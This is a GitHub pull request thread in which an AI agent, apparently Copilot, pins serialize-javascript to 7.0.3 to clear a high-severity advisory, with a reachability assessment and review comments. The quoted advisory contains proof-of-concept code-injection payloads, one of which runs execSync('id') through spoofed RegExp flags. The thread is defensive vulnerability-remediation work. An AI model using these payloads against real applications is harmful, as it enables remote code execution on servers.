Update serialize-javascript to 7.0.3 via npm override (GHSA-5c6j-r48x-rmvq)

[Copilot]

serialize-javascript@6.0.2 has a high-severity RCE via unsanitized RegExp.flags and Date.prototype.toISOString() interpolation (incomplete fix for CVE-2020-7660).

Changes

• Added npm overrides to pin serialize-javascript to 7.0.3. Required because the sole consumer (mocha@11.7.5) constrains it to ^6.0.2 and hasn't updated yet.

"overrides": {
  "serialize-javascript": "7.0.3"
}

Reachability Assessment

Not reachable — high confidence. serialize-javascript is pulled in only by mocha (devDependency). Application code never imports or calls serialize(). Production builds use npm ci --production, so the package isn't even installed in containers. Update is to clear the Dependabot alert, not to mitigate active risk.

Compatibility

serialize-javascript@7.0.3 requires Node ≥20. Dockerfile base image is node:20-slim. Dev-only dependency, so no production surface.

Original prompt

---

This section details the Dependabot vulnerability alert you should resolve

<alert_title>Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()</alert_title>
<alert_description>### Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
#h2. PoC 2: Code Injection via Date.toISOString()

const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
#h2. PoC 3: Remote Code Execution

const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3</alert_description>

high
GHSA-5c6j-r48x-rmvq
serialize-javascript
npm
<vulnerable_versions>6.0.2</vulnerable_versions>
<patched_version>7.0.3</patched_version>
<manifest_path>package-lock.json</manifest_path>

https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq https://nvd.nist.gov/vuln/detail/CVE-2020-7660 https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9 https://github.com/advisories/GHSA-hxcc-f52p-wc94 https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3 https://github.com/advisories/GHSA-5c6j-r48x-rmvq

<task_instructions>Resolve this alert by updating the affected package to a non-vulnerable version. Prefer the lowest non-vulnerable version (see the patched_version field above) over the latest to minimize breaking changes. Include a Reachability Assessment section in the PR description. Review the alert_description field to understand which APIs, features, or configurations are affected, then search the codebase for usage of those specific items. If the vulnerable code path is reachable, explain how (which files, APIs, or call sites use the affected functionality) and note that the codebase is actively exposed to this vulnerability. If the vulnerable code path is not reachable, explain why (e.g. the affected API is never called, the vulnerable configuration is not used) and note that the update is primarily to satisfy vulnerability scanners rather than to address an active risk. If the advisory is too vague to determine reachability (e.g. 'improper input validation' with no specific API named), state that reachability could not be determined and explain why. Include a confidence level in the reachability assessment (e.g. high confidence if the advisory names a specific API and you confirmed it is or is not called, low confidence if the usage is indirect and hard to trace). If no patched version is available, check the alert_description field for a Workarounds section — the advisory may describe configuration changes or usage patterns that miti...

• Resolves github/emergency-pull-request-probot-app alert Bump nock from 13.3.6 to 13.3.8 #82

[github-actions]

=============================== Coverage summary ===============================
Statements   : 100% ( 149/149 )
Branches     : 100% ( 88/88 )
Functions    : 100% ( 27/27 )
Lines        : 100% ( 148/148 )
================================================================================

[Copilot]

Pull request overview

Pins a vulnerable transitive dev dependency (serialize-javascript) to a patched version using npm overrides, addressing GHSA-5c6j-r48x-rmvq while keeping the existing mocha version.

Changes:

• Add overrides.serialize-javascript = 7.0.3 to force the patched version.
• Update package-lock.json to reflect serialize-javascript@7.0.3 under mocha (and remove the old 6.0.2 entry).

Show a summary per file

File	Description
package.json	Adds npm override to pin serialize-javascript to 7.0.3.
package-lock.json	Locks transitive dependency resolution to serialize-javascript@7.0.3 under mocha.

Copilot's findings

Tip

Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

• Files reviewed: 1/2 changed files
• Comments generated: 1

[Copilot]

This override pulls in serialize-javascript@7.x which requires Node >=20. If the project expects contributors to run on Node 18 locally, consider declaring the Node requirement explicitly (e.g., package.json "engines" / .nvmrc / short README note) to avoid confusing install/runtime issues.